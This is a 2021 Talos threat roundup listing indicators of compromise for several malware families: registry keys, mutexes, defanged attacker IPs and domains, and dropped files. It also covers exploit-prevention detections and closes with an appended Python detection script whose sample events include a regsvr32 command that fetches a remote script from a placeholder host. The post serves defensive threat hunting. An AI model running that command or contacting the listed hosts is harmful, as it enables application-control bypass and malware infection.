Friday, October 15, 2021

Threat Roundup for October 8 to October 15


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 8 and Oct. 15. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and by discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Trojan.Zbot-9899961-0 Trojan Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
Win.Packed.Tofsee-9900223-1 Packed Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control.
Win.Dropper.NetWire-9900023-0 Dropper NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Lokibot-9900252-1 Dropper Lokibot is an information-stealing malware that siphons off sensitive information stored on an infected device. It is modular in nature, and contains the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Dropper.Remcos-9900255-1 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Trojan.Fareit-9900344-0 Trojan The Fareit trojan is primarily an information stealer with the functionality to download and install other malware.
Win.Packed.Passwordstealera-9900629-0 Packed This malware has the ability to harvest stored credentials, keystrokes, screenshots, network activity and more from computers where the software is installed.
Win.Ransomware.TeslaCrypt-9901319-0 Ransomware TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransom, and eventually, the malware developers released the master key, allowing all encrypted files to be recovered easily.
Win.Packed.Cryptbot-9901331-1 Packed Cryptbot is an information-stealing trojan that attempts to siphon off passwords and other credentials on an infected machine. It typically masquerades as legitimate software to trick users into installing it.

Threat Breakdown

Win.Trojan.Zbot-9899961-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 22 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 22
<HKCU>\SOFTWARE\MICROSOFT\IKCUPIZOYJI 1
<HKCU>\SOFTWARE\MICROSOFT\IKCUPIZOYJI (Value Name: 9c6ce2j) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Obofor) 1
<HKCU>\SOFTWARE\MICROSOFT\IKCUPIZOYJI (Value Name: 1e3a7hgh) 1
<HKCU>\SOFTWARE\MICROSOFT\IKCUPIZOYJI (Value Name: e3d4491) 1
Mutexes Occurrences
GLOBAL\{<random GUID>} 1
Local\{<random GUID>} 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\NSO9414.bat 1
%HOMEPATH%\AppData\LocalLow\ytbaom.igy 1
%APPDATA%\Etqai 1
%APPDATA%\Etqai\obofor.exe 1
%TEMP%\ADA997F.bat 1
%APPDATA%\Evhye\mizadi.exe 1

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection: Secure Endpoint; Secure Malware Analytics

MITRE ATT&CK technique map

Win.Packed.Tofsee-9900223-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 42 samples
Registry Keys Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config4) 22
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 22
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Type) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Start) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ErrorControl) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: DisplayName) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: WOW64) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ObjectName) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Description) 22
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config1) 22
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config2) 22
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config3) 22
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config0) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ImagePath) 18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\yikfbtso) 3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\oyavrjie) 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\vfhcyqpl) 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\eoqlhzyu) 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\xhjeasrn) 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\nxzuqihd) 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\mwytphgc) 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\wgidzrqm) 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\pzbwskjf) 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching '[a-z]{8}'>.exe 36
%System32%\config\systemprofile:.repos 35
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 35
%SystemRoot%\SysWOW64\config\systemprofile 22
%SystemRoot%\SysWOW64\config\systemprofile:.repos 22
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 21
%TEMP%\glhzxam.exe 1
%TEMP%\fkgywzl.exe 1
%TEMP%\otphfiu.exe 1

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection: Secure Endpoint; Secure Malware Analytics

MITRE ATT&CK technique map

Win.Dropper.NetWire-9900023-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: bfsvc.exe) 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: displaykey) 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: sdiufsdoufbosdfusdf) 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: MSBuild) 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: siucxyviusdddss) 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: slidnfousdbnfousdfnsdf) 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: svhost) 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Skype) 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: notepad) 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Fenrir) 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: ssssfdgvsdVCaWDEWFEGFDSVSDFGVSD22225R2WER) 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Microsoft Window) 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: asiuydyxcyccc) 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: otuuzbek) 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: svchost0982374-2390487) 1
Mutexes Occurrences
- 3
9DAA44F7C7955D46445DC99B 2
OWZCEN323F 1
Remcos_Mutex_Inj 1
vPrrgJFBbFCMmRUhAAGLuHLEYE 1
owGYbEgeDqGveNidINrSFcoig 1
QDHTMSVRYiErLTwFAkbXeSovWEgc 1
gSioxDHMmpAClwRUURwVFgNXbNJ 1
grLGSEYGsNmDzYoikpeuiegAHb 1
aozZhEtRlqmIFFBMlmiEGFxSAJ 1
WavvxbajmYFqTEIJmcJwmYEOGpMjB 1
gqpTIzHLPzoNMEdnaQAcEILEclD 1
JwLTUxlnbqnMViQskymNhEXZIKo 1
vLMEQNzQeVTgibLFhAFuHmztiJcByR 1
Remcos-LKK4DE 1
JVSTrufO 1
Rhuuhhrhhrggdgeyeyey-NJ0NI8 1
Remcos-5JSLAN 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
Files and or directories created Occurrences
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\<exe name>.log 19
%APPDATA%\Oracle\svhost.exe 5
%APPDATA%\Oracle 3
%APPDATA%\7C7955\5D4644.lck 2
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1160359183-2529320614-3255788068-500\a18ca4003deb042bbee7a40f15e1970b_24e2b309-1719-4436-b195-573e7cb0f5b1 2
%APPDATA%\OWZCEN323F 1
%APPDATA%\OWZCEN323F\bfsvc.exe 1
%APPDATA%\Install\.IgHiJkLiO 1
%APPDATA%\remcos\logs.dat 1
%TEMP%\~$fil.xlsx 1
%TEMP%\fil.xlsx 1
%APPDATA%\OWZCEN323F\winhlp32.exe 1
%TEMP%\94218.bat 1
%APPDATA%\Install\MSBuild.exe 1
%APPDATA%\lkjhs.dat 1
%TEMP%\97156.bat 1

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection: Secure Endpoint; Secure Malware Analytics

MITRE ATT&CK technique map

Win.Dropper.Lokibot-9900252-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 49 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 49
Mutexes Occurrences
3749282D282E1E80C56CAE5A 42
9DAA44F7C7955D46445DC99B 22
Global\ae937b61-224a-11ec-b5f8-00501e3ae7b6 1
Global\73856101-224a-11ec-b5f8-00501e3ae7b6 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
phoenixdevs[.]ir 42
Files and or directories created Occurrences
%APPDATA%\D282E1 42
%APPDATA%\D282E1\1E80C5.lck 42
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 42
\TEMP\test.exe 42
\test.exe 22
%APPDATA%\7C7955\5D4644.lck 22
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1160359183-2529320614-3255788068-500\a18ca4003deb042bbee7a40f15e1970b_24e2b309-1719-4436-b195-573e7cb0f5b1 22
%APPDATA%\7C7955\5D4644.exe (copy) 22

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection: Secure Endpoint; Secure Malware Analytics

MITRE ATT&CK technique map

Win.Dropper.Remcos-9900255-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 47 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\REMCOS_EWBKENDENHPKPEP 31
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: remcos) 30
<HKCU>\SOFTWARE\REMCOS_EWBKENDENHPKPEP (Value Name: EXEpath) 30
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 13
Mutexes Occurrences
Remcos_Mutex_Inj 30
remcos_ewbkendenhpkpep 30
Global\{176627fc-9b6d-4f0a-ab26-654a31d03cfd} 13
Global\be11e4e1-f6ea-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
185[.]140[.]53[.]37 30
185[.]244[.]29[.]216 13
Files and or directories created Occurrences
\TEMP\test.exe 44
%TEMP%\install.bat 31
%SystemRoot%\remcos\remcos.exe 31
%APPDATA%\remcos 30
%SystemRoot%\remcos 30
\test.exe 22
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 13
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 13
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 13
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 13
%APPDATA%\24E2B309-1719-4436-B195-573E7CB0F5B1\run.dat 5
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache-child-new.bin 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache-child.bin (copy) 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache-new.bin 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache.bin (copy) 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\startupCache.4.little 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\urlCache-new.bin 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\urlCache.bin (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\addonStartup.json.lz4 (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\addonStartup.json.lz4.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\broadcast-listeners.json (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\broadcast-listeners.json.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\crashes\store.json.mozlz4 (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\crashes\store.json.mozlz4.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\datareporting\aborted-session-ping (copy) 1
*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection: Secure Endpoint; Secure Malware Analytics

MITRE ATT&CK technique map

Win.Trojan.Fareit-9900344-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\WINRAR 11
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 11
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9 (Value Name: F) 11
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5 (Value Name: F) 11
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC (Value Name: F) 11
<HKCU>\SOFTWARE\WINRAR (Value Name: HWID) 11
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
138[.]128[.]171[.]170 3
75[.]98[.]175[.]114 2
166[.]62[.]121[.]61 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
manualportia[.]com[.]br 3
superiorbroomproducers[.]com 2
crawfishtx[.]com 1
Files and or directories created Occurrences
%TEMP%\<random, matching '[0-9]{5,6}'>.bat 11
%TEMP%\1051421727.bat 1
%TEMP%\1051419262.bat 1
%TEMP%\1051422413.bat 1
%TEMP%\1051418217.bat 1
%TEMP%\1051421976.bat 1
%TEMP%\1051423677.bat 1
%TEMP%\1051421025.bat 1
%TEMP%\1051419574.bat 1
%TEMP%\1051418919.bat 1
%TEMP%\1051423302.bat 1
%TEMP%\1051422819.bat 1

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection: Secure Endpoint; Secure Malware Analytics

MITRE ATT&CK technique map

Win.Packed.Passwordstealera-9900629-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 17
Mutexes Occurrences
Global\d7716441-2842-11ec-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Domain Names contacted by malware. Does not indicate maliciousness Occurrences

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection: Secure Endpoint; Secure Malware Analytics

MITRE ATT&CK technique map

Win.Ransomware.TeslaCrypt-9901319-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\TRUEIMG 23
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 23
<HKU>\.DEFAULT\SOFTWARE\TRUEIMG 14
<HKCU>\SOFTWARE\TRUEIMG (Value Name: ID) 14
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> 14
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> (Value Name: data) 14
Mutexes Occurrences
__ms_342234_ 23
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
Files and or directories created Occurrences
*See JSON for more IOCs

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Packed.Cryptbot-9901331-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 19
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
Files and or directories created Occurrences
*See JSON for more IOCs

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (45166)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Crystalbit-Apple DLL double hijack detected - (7792)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Expiro Malware detected - (7379)
Expiro malware is unique in that it infiltrates executable files on both 32- and 64-bit Windows systems by appending its viral code to the host. It can be used to install malicious browser extensions, lower browser security settings, and steal account credentials.
Excessively long PowerShell command detected - (4473)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
A Microsoft Office process has started a Windows utility. - (4364)
A process associated with Microsoft Office, such as EXCEL.exe, OUTLOOK.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
CVE-2020-1472 exploit detected - (2964)
An attempt to exploit CVE-2020-1472, also known as "Zerologon", has been detected. This is a privilege escalation vulnerability in Netlogon.
Dealply adware detected - (2084)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Reverse TCP payload detected - (2003)
An exploit payload intended to connect back to an attacker-controlled host using TCP has been detected.
Squiblydoo application control bypass attempt detected. - (1152)
An attempt to bypass application control via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Kovter injection detected - (663)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
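Three of the behaviours listed above (an Office process spawning a Windows utility, an excessively long PowerShell command line, and regsvr32.exe loading script content from a remote server) can be checked against process-creation telemetry with simple heuristics. The following is an added example written for this post, not Talos or AMP for Endpoints code; the event records, the `LONG_COMMAND_THRESHOLD` value and the `.invalid` hostname are constructed assumptions.

```python
"""Added example (not Talos/AMP code): heuristics over process-creation events
for three behaviours named in the Exploit Prevention list. All events and the
length threshold below are constructed assumptions for illustration."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Parent/child names taken from the post's own description of the detection.
OFFICE_PARENTS = {"excel.exe", "outlook.exe", "winword.exe"}
WINDOWS_UTILITIES = {"powershell.exe", "cmd.exe"}
# Assumed threshold: tune it against a baseline of your own legitimate scripts.
LONG_COMMAND_THRESHOLD = 1000
URL_RE = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process image
    image: str          # full path of the new process image
    command_line: str   # command line of the new process


def _basename(path: str) -> str:
    """Lower-cased file name, accepting either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> List[str]:
    """Return the names of the heuristics an event trips (empty list if none)."""
    hits = []
    parent, child = _basename(event.parent_image), _basename(event.image)
    if parent in OFFICE_PARENTS and child in WINDOWS_UTILITIES:
        hits.append("office-spawned-utility")
    if child == "powershell.exe" and len(event.command_line) > LONG_COMMAND_THRESHOLD:
        hits.append("excessively-long-powershell")
    if child == "regsvr32.exe" and URL_RE.search(event.command_line):
        hits.append("squiblydoo-remote-script")
    return hits


def triage(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Map event index -> tripped heuristics, keeping only events with hits."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}


# Constructed sample events (not from the report's telemetry).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c start update.vbs"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -EncodedCommand " + "A" * 1200),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\regsvr32.exe",
                 "regsvr32.exe /s /i:http://placeholder.invalid/update.sct"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 "notepad.exe report.txt"),
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS).items():
        print(index, hits)
```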
